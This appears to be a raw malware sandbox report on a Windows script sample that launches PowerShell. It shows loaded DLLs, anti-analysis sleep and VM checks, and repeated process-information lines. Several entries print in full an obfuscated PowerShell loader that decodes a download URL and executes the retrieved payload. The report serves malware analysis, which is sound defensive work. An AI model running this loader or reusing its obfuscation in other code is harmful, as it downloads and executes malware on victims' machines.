Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb_ source: powershell.exe, 00000002.00000002.1544139108.000002615F69D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000002.00000002.1572957843.0000026177E51000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: lib.pdb source: powershell.exe, 00000002.00000002.1543947591.000002615F61D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000002.00000002.1572957843.0000026177E51000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.1544139108.000002615F69D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ion.pdb source: powershell.exe, 00000002.00000002.1572957843.0000026177DF2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: *n.pdbr source: powershell.exe, 00000002.00000002.1544139108.000002615F69D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbt source: powershell.exe, 00000002.00000002.1572957843.0000026177E51000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rlib.pdb source: powershell.exe, 00000002.00000002.1572957843.0000026177DF2000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell "$Storvesirerne = 1;$Theologizing='Substrin';$Theologizing+='g';Function Rekordjagt($Spermosphere){$Tr", "0")
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Gennemrystet) if ($_.FullyQualifiedErrorId -ne "NativeCommandErrorMessage" -and $ErrorView -ne "CategoryView") {
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Storvesirerne = 1;$Theologizing='Substrin';$Theologizing+='g';Function Rekordjagt($Spermosphere){$Tryghedsnarkomanerne=$Spermosphere.Length-$Storvesirerne;For($Ichthyocentaur=7; $Ichthyocentaur -lt $Tryghedsnarkomanerne; $Ichthyocentaur+=(8)){$Cottiers+=$Spermosphere.$Theologizing.Invoke($Ichthyocentaur, $Storvesirerne);}$Cottiers;}function Dentagra176($nittenaarsfdselsdag){. ($Systematist) ($nittenaarsfdselsdag);}$Skrive=Rekordjagt 'Sammen MRb igttoMantramzMice laiReformbl chattelDiplom aTilsend/Skunk r5bomrker. Stri.i0Revalua Ukrist(StatuslWInadjusiAco otlnknitweadForure ofjantenwButtonhsBrugsbe UnimpaiNWienersTE.itaxi obriqu1Bstern 0Kyriali.Und,rda0Aerodyn; ,uling PaedonyW SpectriAllergenQuadric6 Ekstem4Apodeme; Picker Femrernx Ellekr6exies o4Fo,film;.rontag Spaan ar Disenavvvesf,o:Circumf1Tryllek2Uncompr1Unimma,.volemit0Rygskst)Poriapr Ungka lG EdderkeUngainlcRes ectkUnlyricoSexolog/ovnhuse2 econce0 hummer1Sirupsh0Notidan0Marinae1Andengr0Erkyndi1Trkvogn DiamantFNonharmiLicen irUncoloueOleatesfNonumbro GlasblxKasse t/ hromat1Copalin2Satanis1 Deriva. Skmtev0Hegemon ';$Rubys=Rekordjagt ' StylteUProsecusOrganiseFade,urr Fjogsf-TyristoASlufssygAn.ideceidentitnShowtimtPeri on ';$Cargoliner=Rekordjagt 'Ast,roih Rep cktSlickertWindroapNonj.rasBoe,neh:Pra inc/Estampi/Mauveagduranophrmalatesistvnersv C ckileTelefon.TrbaadegTornblaoNonreguo ShoalhgBrtsejllkont.nte Voltes.RetstilcVatteriouncathomBaadud,/PaavistuInhalercbane.ak?Frontene Br,dsaxinvocatpv gttaaoDk skoprLubricat portef=OmtalerdSkoleryobrevvekwDubiousnEncastel valitoGipsdepaUnderlodCentime& Undefei,adiostdCon,oci=R.kkest1Bals mmmMo.dilymKatakin5Ar,edtauValentiFAmusivea,orelsndphl.benkSaloond5StatiketKuskeneXB,sttelj VovehaiVitalisZbewidoweCarnosiYOvera eXAld,rmajLhduninWEpa.ortHDaar,kaHAnkl gjF Ventili ,vaporX kanapeFUnmantlf Ma,ked-Karav nB vertisHAdo tivV NonadvBS uljaz_Quotati ';$Constabless=Rekordjagt ' Acture> Immate ';$Systematist=Rekordjagt 'TimbresislavebaeBegonerxSjofeli ';$Ankyloproctia106 = Rekordjagt ' H,ricoe Frank cOmtalenhBeerbiboFreedst Lewist,%OvertypaQ,adrisp synonyp StraffdSerenada Rav lstTorpedoa,rachio% H.plit\WeekendIUsketbarEpicantr h erpre ElectopElephanl KonvenaBod velcAkklimaeGoumieraCircumsbEurop mlSelen gegraablenForsikreUdstra s .ursyls h drum.FacetteSOverratuBastedecEuch,or Solav k&Col.ack&A,gangs GoitereAnsttemcCoazervhSeniorso Proven Contigu$Apperce ';Dentagra176 (Rekordjagt ' Subcya$JourneygMeningol dsboeo Su,ersb ilkombaGnetacelBibliog:Afpa.erHColumbaybec amepSe,plese FluorbrDoerencs LufttreForsyn nAf,rismsStrygejiUnrustibHeldentiGla rinl Krni.ei Draht,tFrictifyOzonate=Washda,(TelefoncSm,dresm hermicdAdoxace Genvisi/.vlningcAdmir l hermov$UncompoAProveninKommandk Unrewoy Ingva lGrimassoHuje trpCowweedrlauds,nokirigamcVe.denst BetutoiCholinea Krimin1Kl,nset0Musikpd6Intermi)pharmac ');Dentagra176 (Rekordjagt 'L gendi$SirrahsgReg
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Storvesirerne = 1;$Theologizing='Substrin';$Theologizing+='g';Function Rekordjagt($Spermosphere){$Tryghedsnarkomanerne=$Spermosphere.Length-$Storvesirerne;For($Ichthyocentaur=7; $Ichthyocentaur -lt $Tryghedsnarkomanerne; $Ichthyocentaur+=(8)){$Cottiers+=$Spermosphere.$Theologizing.Invoke($Ichthyocentaur, $Storvesirerne);}$Cottiers;}function Dentagra176($nittenaarsfdselsdag){. ($Systematist) ($nittenaarsfdselsdag);}$Skrive=Rekordjagt 'Sammen MRb igttoMantramzMice laiReformbl chattelDiplom aTilsend/Skunk r5bomrker. Stri.i0Revalua Ukrist(StatuslWInadjusiAco otlnknitweadForure ofjantenwButtonhsBrugsbe UnimpaiNWienersTE.itaxi obriqu1Bstern 0Kyriali.Und,rda0Aerodyn; ,uling PaedonyW SpectriAllergenQuadric6 Ekstem4Apodeme; Picker Femrernx Ellekr6exies o4Fo,film;.rontag Spaan ar Disenavvvesf,o:Circumf1Tryllek2Uncompr1Unimma,.volemit0Rygskst)Poriapr Ungka lG EdderkeUngainlcRes ectkUnlyricoSexolog/ovnhuse2 econce0 hummer1Sirupsh0Notidan0Marinae1Andengr0Erkyndi1Trkvogn DiamantFNonharmiLicen irUncoloueOleatesfNonumbro GlasblxKasse t/ hromat1Copalin2Satanis1 Deriva. Skmtev0Hegemon ';$Rubys=Rekordjagt ' StylteUProsecusOrganiseFade,urr Fjogsf-TyristoASlufssygAn.ideceidentitnShowtimtPeri on ';$Cargoliner=Rekordjagt 'Ast,roih Rep cktSlickertWindroapNonj.rasBoe,neh:Pra inc/Estampi/Mauveagduranophrmalatesistvnersv C ckileTelefon.TrbaadegTornblaoNonreguo ShoalhgBrtsejllkont.nte Voltes.RetstilcVatteriouncathomBaadud,/PaavistuInhalercbane.ak?Frontene Br,dsaxinvocatpv gttaaoDk skoprLubricat portef=OmtalerdSkoleryobrevvekwDubiousnEncastel valitoGipsdepaUnderlodCentime& Undefei,adiostdCon,oci=R.kkest1Bals mmmMo.dilymKatakin5Ar,edtauValentiFAmusivea,orelsndphl.benkSaloond5StatiketKuskeneXB,sttelj VovehaiVitalisZbewidoweCarnosiYOvera eXAld,rmajLhduninWEpa.ortHDaar,kaHAnkl gjF Ventili ,vaporX kanapeFUnmantlf Ma,ked-Karav nB vertisHAdo tivV NonadvBS uljaz_Quotati ';$Constabless=Rekordjagt ' Acture> Immate ';$Systematist=Rekordjagt 'TimbresislavebaeBegonerxSjofeli ';$Ankyloproctia106 = Rekordjagt ' H,ricoe Frank cOmtalenhBeerbiboFreedst Lewist,%OvertypaQ,adrisp synonyp StraffdSerenada Rav lstTorpedoa,rachio% H.plit\WeekendIUsketbarEpicantr h erpre ElectopElephanl KonvenaBod velcAkklimaeGoumieraCircumsbEurop mlSelen gegraablenForsikreUdstra s .ursyls h drum.FacetteSOverratuBastedecEuch,or Solav k&Col.ack&A,gangs GoitereAnsttemcCoazervhSeniorso Proven Contigu$Apperce ';Dentagra176 (Rekordjagt ' Subcya$JourneygMeningol dsboeo Su,ersb ilkombaGnetacelBibliog:Afpa.erHColumbaybec amepSe,plese FluorbrDoerencs LufttreForsyn nAf,rismsStrygejiUnrustibHeldentiGla rinl Krni.ei Draht,tFrictifyOzonate=Washda,(TelefoncSm,dresm hermicdAdoxace Genvisi/.vlningcAdmir l hermov$UncompoAProveninKommandk Unrewoy Ingva lGrimassoHuje trpCowweedrlauds,nokirigamcVe.denst BetutoiCholinea Krimin1Kl,nset0Musikpd6Intermi)pharmac ');Dentagra176 (Rekordjagt 'L gendi$SirrahsgRegJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFB4B2A00BD pushad ; iretd 2_2_00007FFB4B2A00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFB4B2A097D push E95B63D0h; ret 2_2_00007FFB4B2A09C9
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6803Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3028Jump to behavior
Source: C:\Windows\System32\wscript.exe TID: 5300Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1160Thread sleep time: -5534023222112862s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: wscript.exe, 00000000.00000002.1423874364.000001F461949000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: wscript.exe, 00000000.00000002.1423874364.000001F461949000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}o
Source: wscript.exe, 00000000.00000002.1424370879.000001F461C3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000003.1421866994.000001F46199A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1388165251.000001F46197A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1424050524.000001F46199B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1387704610.000001F461952000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1420637116.000001F461989000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
Source: wscript.exe, 00000000.00000002.1423874364.000001F461949000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}?
Source: powershell.exe, 00000002.00000002.1572957843.0000026177DF2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWa
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\System32\wscript.exeProcess created: Base64 decoded bVyrr4^+y^m)9j&kJ=wy)ja4^Rx2+"hebGkj{lmK"x)jzJ+v6H&5jSkjzg^+m-(1hv5ki^k(bzw^h8'!'+I^!wkkyay'&rZ!ykib^'^y-zh^imljx,lN)oz;Z7
Source: C:\Windows\System32\wscript.exeProcess created: Base64 decoded bVyrr4^+y^m)9j&kJ=wy)ja4^Rx2+"hebGkj{lmK"x)jzJ+v6H&5jSkjzg^+m-(1hv5ki^k(bzw^h8'!'+I^!wkkyay'&rZ!ykib^'^y-zh^imljx,lN)oz;Z7Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Storvesirerne = 1;$Theologizing='Substrin';$Theologizing+='g';Function Rekordjagt($Spermosphere){$Tryghedsnarkomanerne=$Spermosphere.Length-$Storvesirerne;For($Ichthyocentaur=7; $Ichthyocentaur -lt $Tryghedsnarkomanerne; $Ichthyocentaur+=(8)){$Cottiers+=$Spermosphere.$Theologizing.Invoke($Ichthyocentaur, $Storvesirerne);}$Cottiers;}function Dentagra176($nittenaarsfdselsdag){. ($Systematist) ($nittenaarsfdselsdag);}$Skrive=Rekordjagt 'Sammen MRb igttoMantramzMice laiReformbl chattelDiplom aTilsend/Skunk r5bomrker. Stri.i0Revalua Ukrist(StatuslWInadjusiAco otlnknitweadForure ofjantenwButtonhsBrugsbe UnimpaiNWienersTE.itaxi obriqu1Bstern 0Kyriali.Und,rda0Aerodyn; ,uling PaedonyW SpectriAllergenQuadric6 Ekstem4Apodeme; Picker Femrernx Ellekr6exies o4Fo,film;.rontag Spaan ar Disenavvvesf,o:Circumf1Tryllek2Uncompr1Unimma,.volemit0Rygskst)Poriapr Ungka lG 